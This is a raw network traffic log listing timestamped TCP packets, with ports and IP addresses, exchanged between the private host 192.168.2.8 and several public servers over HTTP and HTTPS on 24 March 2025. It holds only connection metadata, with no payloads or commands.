Mar 24, 2025 17:30:43.989296913 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.989424944 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.989475965 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.200326920 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.200382948 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.409985065 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.410015106 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.410080910 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.422069073 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.422074080 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422087908 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422092915 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422225952 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.422231913 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422245979 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422270060 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422286034 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.422290087 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422349930 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.422353983 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422365904 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.422457933 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.422502041 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.632333040 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.632385969 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.813839912 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.813872099 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.813955069 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.825864077 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.825870037 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.825884104 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.825903893 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.825916052 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:44.825921059 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.825984001 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.826095104 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:44.826139927 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:45.233001947 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:45.243598938 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:45.473824024 CET	80	49713	3.133.160.140	192.168.2.8
Mar 24, 2025 17:30:45.473876953 CET	49713	80	192.168.2.8	3.133.160.140
Mar 24, 2025 17:30:45.568694115 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:45.960113049 CET	49671	443	192.168.2.8	204.79.197.203
Mar 24, 2025 17:30:47.909701109 CET	49713	80	192.168.2.8	3.133.160.140
Mar 24, 2025 17:30:49.552339077 CET	49678	443	192.168.2.8	20.42.65.90
Mar 24, 2025 17:30:49.858289003 CET	49678	443	192.168.2.8	20.42.65.90
Mar 24, 2025 17:30:50.467650890 CET	49678	443	192.168.2.8	20.42.65.90
Mar 24, 2025 17:30:50.764493942 CET	49671	443	192.168.2.8	204.79.197.203
Mar 24, 2025 17:30:51.670763016 CET	49678	443	192.168.2.8	20.42.65.90
Mar 24, 2025 17:30:54.078025103 CET	49678	443	192.168.2.8	20.42.65.90
Mar 24, 2025 17:30:58.888991117 CET	49678	443	192.168.2.8	20.42.65.90
Mar 24, 2025 17:31:00.373184919 CET	49671	443	192.168.2.8	204.79.197.203
Mar 24, 2025 17:31:08.498425961 CET	49678	443	192.168.2.8	20.42.65.90
Mar 24, 2025 17:31:12.313189983 CET	49724	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:31:12.313239098 CET	443	49724	142.251.41.4	192.168.2.8
Mar 24, 2025 17:31:12.313296080 CET	49724	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:31:12.313539028 CET	49724	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:31:12.313550949 CET	443	49724	142.251.41.4	192.168.2.8
Mar 24, 2025 17:31:12.523654938 CET	443	49724	142.251.41.4	192.168.2.8
Mar 24, 2025 17:31:12.527796984 CET	49724	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:31:12.527825117 CET	443	49724	142.251.41.4	192.168.2.8
Mar 24, 2025 17:31:22.527514935 CET	443	49724	142.251.41.4	192.168.2.8
Mar 24, 2025 17:31:22.527575016 CET	443	49724	142.251.41.4	192.168.2.8
Mar 24, 2025 17:31:22.527738094 CET	49724	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:31:22.689373970 CET	49724	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:31:22.689398050 CET	443	49724	142.251.41.4	192.168.2.8
Mar 24, 2025 17:31:30.823369026 CET	443	49681	13.107.246.40	192.168.2.8
Mar 24, 2025 17:31:30.823395967 CET	443	49681	13.107.246.40	192.168.2.8
Mar 24, 2025 17:31:30.823539019 CET	49681	443	192.168.2.8	13.107.246.40
Mar 24, 2025 17:31:30.823648930 CET	443	49681	13.107.246.40	192.168.2.8
Mar 24, 2025 17:31:30.823717117 CET	49681	443	192.168.2.8	13.107.246.40
Mar 24, 2025 17:31:30.825968027 CET	49681	443	192.168.2.8	13.107.246.40
Mar 24, 2025 17:31:30.922925949 CET	443	49681	13.107.246.40	192.168.2.8
Mar 24, 2025 17:32:12.375492096 CET	49728	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:32:12.375544071 CET	443	49728	142.251.41.4	192.168.2.8
Mar 24, 2025 17:32:12.375643015 CET	49728	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:32:12.375844002 CET	49728	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:32:12.375863075 CET	443	49728	142.251.41.4	192.168.2.8
Mar 24, 2025 17:32:12.589834929 CET	443	49728	142.251.41.4	192.168.2.8
Mar 24, 2025 17:32:12.590203047 CET	49728	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:32:12.590239048 CET	443	49728	142.251.41.4	192.168.2.8
Mar 24, 2025 17:32:22.610291004 CET	443	49728	142.251.41.4	192.168.2.8
Mar 24, 2025 17:32:22.610352039 CET	443	49728	142.251.41.4	192.168.2.8
Mar 24, 2025 17:32:22.610414982 CET	49728	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:32:22.688240051 CET	49728	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:32:22.688280106 CET	443	49728	142.251.41.4	192.168.2.8
Mar 24, 2025 17:33:08.053689003 CET	49729	80	192.168.2.8	3.128.172.139
Mar 24, 2025 17:33:08.170772076 CET	80	49729	3.128.172.139	192.168.2.8
Mar 24, 2025 17:33:08.170921087 CET	49729	80	192.168.2.8	3.128.172.139
Mar 24, 2025 17:33:08.171150923 CET	49729	80	192.168.2.8	3.128.172.139
Mar 24, 2025 17:33:08.286484003 CET	80	49729	3.128.172.139	192.168.2.8
Mar 24, 2025 17:33:08.896663904 CET	80	49729	3.128.172.139	192.168.2.8
Mar 24, 2025 17:33:08.951817989 CET	49729	80	192.168.2.8	3.128.172.139
Mar 24, 2025 17:33:09.043720961 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.043752909 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.043827057 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.045069933 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.045083046 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.285146952 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.285218954 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.287373066 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.287380934 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.287619114 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.342391014 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.344629049 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.388318062 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684369087 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684427023 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684433937 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684461117 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684475899 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684482098 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684672117 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.684690952 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.684885025 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.924050093 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.924065113 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.924103022 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.924175978 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.924175978 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.924194098 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.924209118 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.924226999 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.924258947 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.924288034 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.924288034 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.924298048 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.926781893 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.927037001 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.927056074 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.927109003 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:09.927124023 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:09.967612982 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.042772055 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.042798996 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.042843103 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.042989016 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.042989016 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.043004036 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.046664953 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.046694994 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.046802044 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.046802044 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.046812057 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.094069004 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.164467096 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.164489031 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.164525032 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.164563894 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.164576054 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.164632082 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.166573048 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.166604996 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.166659117 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.166666985 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.166683912 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.217477083 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.284403086 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284418106 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284447908 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284490108 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284522057 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284542084 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284548998 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.284548998 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.284573078 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284584999 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.284630060 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.284630060 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.284640074 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.326807976 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.396791935 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.396811962 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.396840096 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.396977901 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.396977901 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.397005081 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.398534060 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.398551941 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.398607016 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.398629904 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.398684025 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.451832056 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.517854929 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.517878056 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.517908096 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.518034935 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.518052101 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.518110991 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.561206102 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.636094093 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.636118889 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.636152983 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.636348963 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.636372089 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.637567997 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.637592077 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.637635946 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.637651920 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.637676954 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.686167002 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.756337881 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.756360054 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.756427050 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.756459951 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.756473064 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.756484985 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.757602930 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.757622957 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.757675886 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.757683992 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.757709026 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.811177969 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.873557091 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.873580933 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.873616934 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.873788118 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.873797894 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.920620918 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.992852926 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.992866993 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.992911100 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.992942095 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:10.993125916 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.993125916 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:10.993139982 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.045588970 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.107548952 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107563972 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107616901 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107645988 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107657909 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107680082 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107705116 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107717991 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107738018 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.107749939 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.107814074 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.154947996 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.219630003 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.219644070 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.219679117 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.219705105 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.219727039 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.219738960 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.219772100 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.264302015 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.336915016 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.336925030 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.336958885 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.336983919 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.337022066 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.337033987 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.337063074 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.340873003 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.340893984 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.340971947 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.340982914 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.389318943 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.389328957 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.436220884 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.457892895 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.457905054 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.457937002 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.457962036 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.458015919 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.458026886 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.458070993 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.568552017 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.568572044 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.568595886 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.568682909 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.568694115 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.568737984 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.667673111 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.667695999 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.667772055 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.667788982 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.667979002 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.686676025 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.692564011 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.692580938 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.692692041 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.692703962 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.692719936 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.734467030 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.802056074 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.802078009 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.802176952 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.802202940 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.802292109 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.802344084 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.842720985 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.892533064 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.892555952 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.892608881 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.892688036 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.892703056 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.893564939 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.919234991 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.919261932 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.919341087 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:11.919353962 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:11.967813015 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.030113935 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.030127048 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.030163050 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.030173063 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.030216932 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.030284882 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.030308962 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.030353069 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.037256002 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.037264109 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.037292957 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.037301064 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.037367105 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.037367105 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.037374973 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.037463903 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.151196957 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.151220083 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.151262999 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.151367903 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.151391029 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.151431084 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.202191114 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.244724035 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.244738102 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.244781017 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.244810104 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.245012045 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.245026112 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.273319006 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.273350000 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.273379087 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.273400068 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.273412943 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:12.273542881 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:12.327225924 CET	49730	443	192.168.2.8	3.5.129.15
